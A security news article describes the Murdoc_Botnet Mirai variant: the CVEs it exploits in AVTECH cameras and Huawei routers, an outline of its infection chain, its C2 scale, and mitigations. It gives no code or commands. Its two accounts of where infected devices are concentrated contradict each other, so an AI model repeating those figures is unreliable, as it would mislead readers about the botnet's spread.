Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action

Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action

Overview of Murdoc_Botnet

A new variant of the Mirai botnet, dubbed "Murdoc_Botnet," has been identified and is actively exploiting vulnerabilities in Internet of Things (IoT) devices, particularly AVTECH IP cameras and Huawei HG532 routers. This botnet was first detected in July 2024 and has since infected over 1,370 devices globally, with a significant concentration in Malaysia, Mexico, Thailand, Indonesia, and Vietnam13.

Exploited Vulnerabilities

Murdoc_Botnet leverages known security flaws to gain initial access to IoT devices. The vulnerabilities exploited include:

  • CVE-2024-7029: A recent vulnerability that has been used to compromise AVTECH devices.
  • CVE-2017-17215: An older vulnerability affecting Huawei routers, which remains unpatched in many devices13.

Infection and Malware Deployment

The botnet uses a combination of ELF files and shell scripts to infiltrate devices. Here’s a step-by-step breakdown of the infection process:

  • Initial Exploitation: The botnet exploits the mentioned vulnerabilities to execute shell scripts on the target devices.
  • Payload Fetching: These scripts fetch and execute the malware payload, which is tailored to the CPU architecture of the infected device.
  • Command and Control: The malware establishes a connection with command-and-control (C2) servers, awaiting further instructions for DDoS attacks and other malicious activities13.

Command and Control Infrastructure

The Murdoc_Botnet operates with an extensive infrastructure involving over 100 distinct C2 servers. Each server manages and propagates malware to compromised devices, orchestrating activities such as payload execution, further infection, and botnet expansion3.

Impact and Targets

The primary goal of Murdoc_Botnet is to create a large-scale botnet for conducting Distributed Denial-of-Service (DDoS) attacks. The sectors most affected include telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. Over 55% of the compromised devices are located in India, followed by South Africa, Brazil, Bangladesh, and Kenya1.

To safeguard against these attacks, it is advised to:

  • Monitor Network Traffic: Regularly monitor for suspicious processes, events, and network traffic spawned by the execution of any untrusted binaries and scripts.
  • Update Firmware: Ensure that all systems and firmware are updated with the latest releases and patches.
  • Change Default Credentials: Change the default username and password for IoT devices to prevent easy exploitation13.

Broader Context of Mirai Botnet and IoT Vulnerabilities

Mirai Botnet Variants

Murdoc_Botnet is part of a larger family of Mirai botnet variants that have been active in exploiting IoT vulnerabilities. Other recent variants include "gayfemboy," which targeted Four-Faith industrial routers using a recently disclosed security flaw since early November 20241.

The use of IoT devices in DDoS attacks is a growing trend. For example, Cloudflare reported a record-breaking 5.6 Tbps UDP DDoS attack in October 2024, which was launched by a Mirai-variant botnet involving over 13,000 IoT devices. This highlights the critical need for automated and in-line DDoS protection services due to the short duration and high intensity of such attacks5.

Security Risks for AVTECH and Huawei Devices

The exploitation of vulnerabilities in AVTECH IP cameras and Huawei routers by Murdoc_Botnet underscores the ongoing security risks associated with these devices. It is crucial for users and administrators to be vigilant about updating firmware and changing default credentials to mitigate these risks. The fact that many of these devices remain unpatched and vulnerable to older exploits like CVE-2017-17215 exacerbates the issue13.

In summary, the Murdoc_Botnet represents a significant threat to IoT security, leveraging known vulnerabilities to create extensive botnet networks for DDoS attacks. The ongoing activity emphasizes the need for proactive security measures, including regular updates, monitoring, and the use of secure credentials. For more detailed information, refer to the sources from Qualys and Cloudflare135.